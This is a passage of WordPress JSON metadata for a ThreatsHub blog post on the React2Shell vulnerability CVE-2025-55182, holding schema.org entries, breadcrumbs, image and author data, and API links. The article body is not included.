Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation","datePublished":"2025-12-10T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/"},"wordCount":1638,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Latest News","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","url":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/","name":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80","datePublished":"2025-12-10T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/CVE-2025-55182-thumb:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/cve-2025-55182-react2shell-analysis-proof-of-concept-chaos-and-in-the-wild-exploitation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59824"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59824\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}